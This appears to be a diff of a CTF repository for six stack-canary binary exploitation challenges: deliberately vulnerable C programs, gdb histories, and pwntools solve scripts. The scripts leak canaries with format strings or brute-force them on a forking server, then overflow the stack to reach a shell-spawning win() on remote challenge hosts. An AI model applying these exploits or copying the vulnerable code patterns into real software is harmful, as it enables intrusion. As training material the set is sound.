Second CTFs part

canary/01_pastry_shop/.gdb_history

@@ -0,0 +1,56 @@
+quit
+disass vuln
+b *0x00000000004013fa
+disass vuln
+r
+print $rax
+disass vuln
+info registers
+c
+clear
+r
+x/10x $rsp
+x/10x $rsp - 0x8
+disass vuln
+x/10x $rbp - 0x8
+x/10x $fs
+x/10x 0x28
+x/10x $rbp
+x/10x $rbp - 0x8
+x/10x ($rbp - 0x8)
+r
+quit
+disass vuln
+b *0x00000000004013fa
+r
+print $rax
+info registers
+disass vuln
+b *0x00000000004013f6
+r
+r
+r
+r
+disass vuln
+r
+n
+r
+r
+disass vuln
+b *0x00000000004013f5
+r
+print $rax
+n
+print $rax
+n
+print $rax
+info registers
+print 0x7fffffffda28
+gdb config context.nb_lines_stack 32
+gef config context.nb_lines_stack 32
+r
+n
+r
+r
+oaacpaacqaacraacsaactaacuaacvaacwaacxaacyaac
+quit

canary/01_pastry_shop/solve.py

@@ -0,0 +1,30 @@
+#!/usr/bin/env python3
+from pwn import *
+
+# elf = context.binary = ELF('./pastry_shop', checksec=False)
+
+# %lx.%lx.%lx.%lx.%lx.%lx.%lx.%lx
+CANARY_IDX = 23
+OFFSET_TO_CANARY = 72
+# Space between canary and RIP
+OFFSET_TO_RIP = 88
+
+# p = process(elf.path)
+p = remote("offsec.m0lecon.it", 13538)
+p.recvuntil(b"dear customer?\n")
+p.sendline(f"%{CANARY_IDX}$lx".encode())
+leak = p.recvline().strip()
+canary = int(leak, 16)
+log.info(f"canary = {canary:#x}")
+win_addr = 0x00000000004012C2
+p.recvuntil(b"to order?\n")
+
+payload = flat(
+    b"A" * OFFSET_TO_CANARY,
+    p64(canary),
+    b"B" * (OFFSET_TO_RIP - OFFSET_TO_CANARY - 8),
+    p64(win_addr),
+)
+
+p.send(payload)
+p.interactive()

canary/02_fortune_cookie/.gdb_history

@@ -0,0 +1,48 @@
+disass vuln
+disass main
+b *0x00000000004018ef
+r
+print $rbp
+print $rdx
+r
+r
+run
+quit
+r
+r
+quit
+r
+disass main
+quit
+disass 
+disass handle_client
+quit
+disass handle_data
+disass vuln
+disass main
+r
+quit
+disass read_data
+b *0x00000000004015d3
+r
+quit
+b win
+r
+r
+r
+quit
+set follow-fork-mode child
+disass read_data
+b *0x00000000004015dc
+r
+r
+quit
+set follow-fork-mode child
+disass win
+b win
+r
+r
+exit
+disass win
+b *0x0000000000401530
+r

canary/02_fortune_cookie/flag

@@ -0,0 +1 @@
+prova prova

canary/02_fortune_cookie/solve.py

@@ -0,0 +1,56 @@
+#!/usr/bin/env python3
+import time
+
+from pwn import *
+
+HOST, PORT = "offsec.m0lecon.it", 13569
+# HOST, PORT = '127.0.0.1', 4444
+OFFSET_TO_CANARY = 72
+OFFSET_TO_RIP = OFFSET_TO_CANARY + 8 + 8
+
+elf = ELF("./fortune_cookie", checksec=False)
+
+# bruteforce canary on fork server
+known = b"\x00"
+"""for i in range(7):
+    for bval in range(256):
+        guess = known + bytes([bval])
+        payload = b"A" * OFFSET_TO_CANARY + guess
+
+        io = remote(HOST, PORT, level='error')
+        io.recvuntil(b"wish\n")
+        io.send(payload)
+        try:
+            data = io.recv(timeout=0.2)
+        except EOFError:
+            data = b""
+        io.close()
+
+        if b"OK" in data:
+            known = guess
+            log.success(f"byte {i+1}: {bval:02x}")
+            break
+"""
+# canary = u64(known)
+canary = 0x4F03B0B41EBDDB00
+log.info(f"Canary: {canary:#x}")
+# gadget = 0x4013cf
+gadget = 0x000000000040190D
+gadget4 = 0x0000000000401016
+gadget3 = 0x0000000000401438
+gadget2 = 0x40101A
+io = remote(HOST, PORT)
+io.recvuntil(b"wish\n")
+payload = flat(
+    b"A" * OFFSET_TO_CANARY,
+    p64(canary),
+    # b'B' * 8,
+    b"B" * (OFFSET_TO_RIP - OFFSET_TO_CANARY - 8),
+    p64(gadget2),  # Gadget
+    p64(elf.sym.win),
+)
+io.send(payload)
+# io.recvline()
+io.interactive()
+# io.sendline(b'ls')
+io.recvline()

canary/03_space_station/.gdb_history

@@ -0,0 +1,27 @@
+r
+disass vuln
+b *0x000055555555534e
+r
+quit
+disass vuln
+b vuln
+r
+n
+n
+disass vuln
+b *0x000055555555535e
+disass vuln
+n
+c
+disass main
+n
+disass main
+disass vuln
+disass init
+disass start
+quit
+disass vuln
+disass main
+disass vuln
+disass main
+quit

canary/03_space_station/find_canary.py

@@ -0,0 +1,20 @@
+#!/usr/bin/env python3
+from pwn import *
+import re
+
+elf = context.binary = ELF("./space_station", checksec=False)
+
+#p = process(elf.path)
+context.log_level='warn'
+offset = 0x139e
+for i in range(35):
+    p = process(elf.path)
+    p.recvline()
+    p.sendline(f"%{i}$lx") 
+    val = p.recvline().split(b":")[1].strip()
+    print(f"Pos:{i} Value: {val}")
+    if( val[-2:] == b"00"):
+        print(f"Possible canary: {val} at position: {i}")
+    p.shutdown()
+
+#p.interactive()

canary/03_space_station/main.c

@@ -0,0 +1,33 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+
+void setup() {
+    setvbuf(stdin, NULL, _IONBF, 0);
+    setvbuf(stdout, NULL, _IONBF, 0);
+    setvbuf(stderr, NULL, _IONBF, 0);
+}
+
+void win() {
+    printf("Mission accomplished! Opening airlock:\n");
+    system("/bin/sh");
+}
+
+void vuln() {
+    char buf[64];
+    
+    printf("Enter your astronaut ID: ");
+    read(0, buf, 63);
+    buf[63] = '\0';
+    printf(buf);
+    
+    printf("\nSubmit your mission log: ");
+    read(0, buf, 256);
+}
+
+int main() {
+    setup();
+    printf("Welcome aboard the Space Station!\n");
+    vuln();
+    return 0;
+}

canary/03_space_station/solve.py

@@ -0,0 +1,41 @@
+#!/usr/bin/env python3
+import re
+
+from pwn import *
+
+CANARY_POS = 15
+RETURN_POS = 17  # (Seen from the find_canary script and gdb rel value)
+CANARY_OFF = 72
+# Next instruction after the main() calls vuln()
+main_rel = 0x139E  # Relative address after the vuln call in main
+win_rel = 0x1275
+elf = context.binary = ELF("./space_station", checksec=False)
+
+# p = process(elf.path)
+p = remote("offsec.m0lecon.it", 13583)
+
+p.sendline(f"%{CANARY_POS}$lx.%{RETURN_POS}$lx".encode())
+p.recvline()
+rawout = p.recvline().split(b":")[1].strip()
+canary_raw = rawout.split(b".")[0]
+ret_raw = rawout.split(b".")[1]
+
+canary = int(canary_raw, 16)
+# Return address on the stack of the vuln() function
+ret = int(ret_raw, 16)
+# Base address end with three 000 because is the beginning of a memory page
+base_addr = ret - main_rel
+print(f"{p64(canary)} and {p64(base_addr)}")
+print(f"Base address: {hex(base_addr)}")
+payload = flat(
+    b"A" * CANARY_OFF,
+    p64(canary),
+    b"B" * 8,
+    p64(base_addr + 0x000000000000101A),  # ret gadget
+    p64(base_addr + win_rel),
+)
+p.send(payload)
+print(p.recvline())
+print(p.recvline())
+
+p.interactive()

canary/04_secret_library/.gdb_history

@@ -0,0 +1,21 @@
+quit
+quit
+r
+disass vuln
+b *0x0000000000401364
+R
+R
+r
+disass vuln
+r
+disass vuln
+r
+n
+disass vuln
+r
+n
+disass vuln
+b *0x000000000040135b
+r
+r
+quit

canary/04_secret_library/find_canary.py

@@ -0,0 +1,17 @@
+#!/usr/bin/env python3
+from pwn import *
+import re
+
+elf = context.binary = ELF("./secret_library", checksec=False)
+
+context.log_level='warn'
+for i in range(35):
+    p = process(elf.path)
+    p.recvline()
+    p.sendline(f"%{i}$lx") 
+    val = p.recvline().split(b",")[1].strip()
+    if( val[-2:] == b"00"):
+        print(f"Possible canary: {val} at position: {i}")
+    p.shutdown()
+
+#p.interactive()

canary/04_secret_library/main.c

@@ -0,0 +1,34 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+
+void setup() {
+    setvbuf(stdin, NULL, _IONBF, 0);
+    setvbuf(stdout, NULL, _IONBF, 0);
+    setvbuf(stderr, NULL, _IONBF, 0);
+}
+
+void win() {
+    printf("You've discovered the forbidden section!\n");
+    system("/bin/sh");
+}
+
+void vuln() {
+    char buf[128];
+    
+    printf("Sign the guestbook: ");
+    read(0, buf, 127);
+    buf[127] = '\0';
+    printf("Hello, ");
+    printf(buf);
+    
+    printf("\nLeave a review: ");
+    read(0, buf, 512);
+}
+
+int main() {
+    setup();
+    printf("Welcome to the Secret Library!\n");
+    vuln();
+    return 0;
+}

canary/04_secret_library/solve.py

@@ -0,0 +1,26 @@
+#!/usr/bin/env python3
+from pwn import *
+
+CANARY_POS = 23 
+CANARY_OFF = 136
+elf = context.binary = ELF("./secret_library", checksec=False)
+
+#p = process(elf.path)
+p = remote('offsec.m0lecon.it', 13501)
+print(p.recvline())
+p.sendline(f"%{CANARY_POS}$lx".encode())
+val = p.recvline().split(b",")[1].strip()
+print(val)
+canary = int(val, 16)
+print(p.recvline())
+payload = flat(
+    b'A' * CANARY_OFF,
+    p64(canary),
+    b'B' * 8, #pass rbp
+    p64(0x000000000040101a),
+    p64(0x0000000000401262),
+)
+p.send(payload)
+print(p.recvline())
+#print(p.recvline())
+p.interactive()

canary/05_cafe_menu/.gdb_history

@@ -0,0 +1,7 @@
+disass vuln
+b *0x0000000000401355
+r
+bkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaab
+quit
+disass vuln
+quit

canary/05_cafe_menu/main.c

@@ -0,0 +1,44 @@
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+
+static void setup(void) {
+    setvbuf(stdin, NULL, _IONBF, 0);
+    setvbuf(stdout, NULL, _IONBF, 0);
+    setvbuf(stderr, NULL, _IONBF, 0);
+}
+
+__attribute__((noreturn)) static void win(void) {
+    puts("Chef's special unlocked!");
+    char *argv[] = {"/bin/sh", NULL};
+    execve("/bin/sh", argv, NULL);
+    _exit(0);
+}
+
+static void vuln(void) {
+    struct {
+        char menu[48];
+        volatile unsigned int idx;
+    } data;
+
+    data.idx = 0;
+
+    printf("Enter today's specials (send 0xff to finish):\n");
+
+    while (data.idx < 200) {
+        char c;
+        if (read(STDIN_FILENO, &c, 1) != 1) break;
+        if ((unsigned char)c == 0xff) break;
+        data.menu[data.idx] = c;
+        data.idx++;
+    }
+
+    printf("Menu updated!\n");
+}
+
+int main(void) {
+    setup();
+    printf("Welcome to the Cafe!\n");
+    vuln();
+    return 0;
+}

canary/05_cafe_menu/solve.py

@@ -0,0 +1,22 @@
+#!/usr/bin/env python3
+from pwn import *
+
+elf = context.binary = ELF("./cafe_menu", checksec=False)
+
+BUF_LEN = 48
+# CANARY_OFF = 50
+AFTER_CANARY = 0x3F
+# p = process(elf.path)
+p = remote("offsec.m0lecon.it", 13563)
+print(p.recvline())
+# We can overwrite IDX to make it write on the stack after the canary position
+payload = flat(
+    b"A" * 48,
+    b"\x3f",  # After canary offset found
+    b"A" * 8,  # Skip rbp
+    p64(0x401262),  # win
+    b"\xff",
+)
+p.send(payload)
+print(p.recvline())
+p.interactive()

canary/06_weather_station/main.c

@@ -0,0 +1,129 @@
+#include <arpa/inet.h>
+#include <netinet/in.h>
+#include <signal.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/socket.h>
+#include <sys/types.h>
+#include <sys/wait.h>
+#include <unistd.h>
+
+static void setup(void) {
+    setvbuf(stdin, NULL, _IONBF, 0);
+    setvbuf(stdout, NULL, _IONBF, 0);
+    setvbuf(stderr, NULL, _IONBF, 0);
+}
+
+static void reap_children(int sig) {
+    (void)sig;
+    while (waitpid(-1, NULL, WNOHANG) > 0) {
+    }
+}
+
+__attribute__((noreturn)) static void win(void) {
+    puts("Storm warning! Here's your emergency shell:");
+    char *argv[] = {"/bin/sh", NULL};
+    execve("/bin/sh", argv, NULL);
+    _exit(0);
+}
+
+static void read_query(int fd) {
+    char query[48];
+
+    ssize_t n = read(fd, query, 256);
+    if (n <= 0) {
+        return;
+    }
+}
+
+static void handle_client(int fd) {
+    dup2(fd, STDIN_FILENO);
+    dup2(fd, STDOUT_FILENO);
+    dup2(fd, STDERR_FILENO);
+
+    alarm(2);
+
+    char location[16];
+
+    const char *banner = "Welcome to the Weather Station!\n";
+    (void)write(fd, banner, strlen(banner));
+
+    const char *prompt1 = "Enter your location: ";
+    (void)write(fd, prompt1, strlen(prompt1));
+    (void)read(fd, location, sizeof(location));
+
+    const char *prompt2 = "Submit your forecast query: ";
+    (void)write(fd, prompt2, strlen(prompt2));
+
+    read_query(fd);
+
+    const char *ok = "Forecast sent!\n";
+    (void)write(fd, ok, strlen(ok));
+}
+
+int main(int argc, char **argv) {
+    setup();
+
+    int port = 5555;
+    if (argc == 2) {
+        port = atoi(argv[1]);
+        if (port <= 0 || port > 65535) {
+            fprintf(stderr, "Invalid port\n");
+            return 1;
+        }
+    }
+
+    signal(SIGCHLD, reap_children);
+
+    int s = socket(AF_INET, SOCK_STREAM, 0);
+    if (s < 0) {
+        perror("socket");
+        return 1;
+    }
+
+    int opt = 1;
+    setsockopt(s, SOL_SOCKET, SO_REUSEADDR, &opt, sizeof(opt));
+
+    struct sockaddr_in addr;
+    memset(&addr, 0, sizeof(addr));
+    addr.sin_family = AF_INET;
+    addr.sin_addr.s_addr = htonl(INADDR_ANY);
+    addr.sin_port = htons((uint16_t)port);
+
+    if (bind(s, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
+        perror("bind");
+        return 1;
+    }
+
+    if (listen(s, 16) < 0) {
+        perror("listen");
+        return 1;
+    }
+
+    printf("Weather Station listening on 0.0.0.0:%d\n", port);
+
+    while (1) {
+        int fd = accept(s, NULL, NULL);
+        if (fd < 0) {
+            perror("accept");
+            continue;
+        }
+
+        pid_t pid = fork();
+        if (pid < 0) {
+            perror("fork");
+            close(fd);
+            continue;
+        }
+
+        if (pid == 0) {
+            close(s);
+            handle_client(fd);
+            close(fd);
+            _exit(0);
+        }
+
+        close(fd);
+    }
+}

canary/06_weather_station/solve.py

@@ -0,0 +1,58 @@
+#!/usr/bin/env python3
+from pwn import *
+import time
+
+context.binary = elf = ELF('./weather_station', checksec=False)
+
+p = process(elf.path)
+
+HOST, PORT = 'offsec.m0lecon.it', 13559
+#HOST, PORT = '127.0.0.1', 5555
+OFFSET_TO_CANARY = 56
+#
+#OFFSET_TO_RIP = OFFSET_TO_CANARY + 8 + 8
+
+known = b"\x00"
+
+for i in range(7):
+    for bval in range(256):
+        guess = known + bytes([bval])
+        payload = b"A" * OFFSET_TO_CANARY + guess
+
+        io = remote(HOST, PORT, level='error')
+        io.recvuntil(b'location: ')
+        io.sendline(b"Safe")
+        io.recvuntil(b'query: ')
+        io.send(payload)
+
+        try:
+            data = io.recv(timeout=0.2)
+        except EOFError:
+            data = b""
+        io.close()
+        if b"Forecast sent!" in data:
+            known = guess
+            log.success(f"byte {i+1}: {bval:02x}")
+            break
+
+canary = u64(known)
+
+log.info(f"Canary: {canary:#x}")
+
+
+io = remote(HOST, PORT, level='error')
+io.recvuntil(b'location: ')
+io.sendline(b"Safe")
+io.recvuntil(b'query: ')
+
+payload = flat(
+    b'A' * OFFSET_TO_CANARY,
+    p64(canary),
+    b'B' * 8,
+    p64(0x000000000040101a),
+    p64(0x0000000000401530),
+)
+io.send(payload)
+print(io.recvline())
+print(io.sendline(b'cat /home/user/flag'))
+io.interactive()